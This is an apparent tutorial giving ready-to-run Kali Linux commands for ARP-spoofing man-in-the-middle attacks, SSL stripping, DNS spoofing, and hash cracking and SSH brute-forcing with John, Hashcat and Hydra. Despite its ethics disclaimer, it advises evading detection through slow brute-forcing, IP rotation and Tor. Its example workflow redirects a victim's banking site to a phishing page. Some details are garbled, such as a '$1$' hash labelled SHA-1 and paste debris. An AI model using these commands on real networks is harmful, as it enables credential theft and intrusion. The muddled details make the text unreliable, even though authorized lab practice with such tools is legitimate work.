Here’s a guide to conducting man-in-the-middle (MITM) attacks, DNS spoofing, and password cracking using Kali Linux. Note : These techniques are for ethical hacking purposes only and must be performed in a controlled lab environment with proper authorization.
1. Man-in-the-Middle (MITM) Attack
Objective : Intercept and manipulate traffic between a victim and a target server.
Tools :
- Ettercap : GUI/CLI tool for ARP spoofing.
- Bettercap : Modern MITM framework.
- Wireshark : Capture and analyze intercepted traffic.
Steps :
A. ARP Spoofing (MITM Setup)
- Enable IP Forwarding (to route traffic):
- echo 1 > /proc/sys/net/ipv4/ip_forward
- Use Bettercap to perform ARP spoofing:
- bettercap -iface eth0 -eval “set arp.spoof.targets 192.168.1.100; arp.spoof on”
- Replace
192.168.1.100with the victim’s IP. - The default gateway (router) will be spoofed automatically.
- Replace
- bettercap -iface eth0 -eval “set arp.spoof.targets 192.168.1.100; arp.spoof on”
- Capture HTTP Traffic :
- bettercap -eval “http.hijack on; http.proxy on”
- This will redirect HTTP traffic to your machine and log credentials.
- bettercap -eval “http.hijack on; http.proxy on”
B. SSL Stripping (Bypass HTTPS)
bettercap -eval “set https.strip true; https.proxy on”
- Forces HTTPS traffic to downgrade to HTTP, exposing sensitive data.
C. Wireshark Analysis :
wireshark
- Capture traffic on the interface (e.g.,
eth0). - Filter for
httportcpto analyze intercepted data.
2. DNS Spoofing (DNS Poisoning)
Objective : Redirect a victim’s domain requests to a malicious IP.
Tools :
- Bettercap : Simple DNS spoofing.
- dnsmasq : Lightweight DNS server for fake entries.
- iptables : Redirect DNS traffic.
Steps :
A. Using Bettercap
- Spoof DNS Requests :
- bettercap -eval “dns.spoof.domains google.com:192.168.1.100; dns.spoof on”
- Replace
google.comwith the target domain and192.168.1.100with your malicious IP.
- Replace
- bettercap -eval “dns.spoof.domains google.com:192.168.1.100; dns.spoof on”
- Test the Spoof :
- When the victim visits
google.com, they’ll be redirected to your IP.
- When the victim visits
B. Using Dnsmasq
- Install dnsmasq :
- sudo apt install dnsmasq
- Configure dnsmasq :
- sudo nano /etc/dnsmasq.conf
- # Add the following line to redirect example.com to your IP:
- address=/example.com/192.168.1.100
- Restart dnsmasq :
- sudo systemctl restart dnsmasq
- Redirect DNS Traffic (using iptables):
- sudo iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to-destination 192.168.1.100
3. Password Cracking
Objective : Recover passwords from captured hashes or brute-force weak credentials.
Tools :
- John the Ripper : Fast CPU-based cracking.
- Hashcat : GPU-accelerated cracking.
- Hydra : Brute-force network services (SSH, FTP, etc.).
Steps :
A. Cracking Hashes with John the Ripper
- Obtain Hashes (e.g., from a captured file or a vulnerable service):
- # Example hash (SHA-1):$1$abcdefghijklmnopqrstuvwxyz
- Crack with John :bashCopy1john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt
B. GPU-Accelerated Cracking with Hashcat
- Install Hashcat (if not pre-installed in Kali):
- sudo apt install hashcat
- Crack a Hash (e.g., SHA-1):
- hashcat -m 100 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
-m 100specifies the hash type (SHA-1).-a 0uses a dictionary attack.
- hashcat -m 100 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
C. Brute-Force SSH with Hydra
- Brute-force SSH :
- hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh
- Replace
adminwith the username to target.
- Replace
- hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh
D. Cracking NTLM Hashes (Windows)
- Use Hashcat :
- hashcat -m 1000 -a 0 -o cracked.txt ntlm_hash.txt /usr/share/wordlists/rockyou.txt
-m 1000specifies NTLM hashes.
- hashcat -m 1000 -a 0 -o cracked.txt ntlm_hash.txt /usr/share/wordlists/rockyou.txt
Quick Reference Table
| Technique | Tool | Command/Usage |
|---|---|---|
| ARP Spoofing | Bettercap | bettercap -eval "arp.spoof on" |
| DNS Spoofing | Bettercap | bettercap -eval "dns.spoof. domains google.com:mal_ip; dns.spoof on" |
| SSL Stripping | Bettercap | bettercap -eval "https.strip on" |
| John the Ripper | John | john --wordlist=rockyou.txt hash.txt |
| Hashcat | Hashcat | hashcat -m 0 -a 0 hash.txt rockyou.txt |
| Hydra SSH | Hydra | hydra -l user -P pass.txt 192.168.1.100 ssh |
Best Practices
- Ethical Compliance :
- Authorization : Only test systems you own or with explicit permission.
- Scope : Define clear boundaries to avoid unintended damage.
- Legal Risks :
- Do not perform these attacks on unauthorized networks or systems.
- Report findings to the affected organization if authorized.
- Avoid Detection :
- Use slow brute-force rates to avoid triggering alarms.
- Rotate IPs or use Tor for anonymity (if legal).
- Use VMs :
- Test in a virtual lab (e.g., Metasploitable VM) to isolate risks.
Example Workflow
- MITM Attack :
- Use Bettercap to intercept traffic between a victim and a website.
- Capture credentials via HTTP hijacking.
- DNS Spoofing :
- Redirect the victim’s banking site to a phishing page.
- Password Cracking :
- Use captured hashes to crack passwords with Hashcat.
Practice Resources
- Tools :
- Kali Linux : Pre-installed tools for MITM and cracking.
- Metasploitable VM : A vulnerable VM for testing.
- Platforms :
- Hack The Box (Practice MITM and password cracking).
- TryHackMe (Rooms like “MITM” and “Password Cracking”).
Final Notes
- Stay Updated : Follow CVE databases (e.g., CVE Details ).
- Automate : Write scripts for repetitive tasks (e.g., hash cracking loops).
- Join Communities : Engage with Offensive Security or Reddit’s r/NetSecpentest .
By mastering these techniques, you’ll gain insight into network vulnerabilities and the importance of secure configurations. Always prioritize ethical and legal compliance ! 🔍🛡️
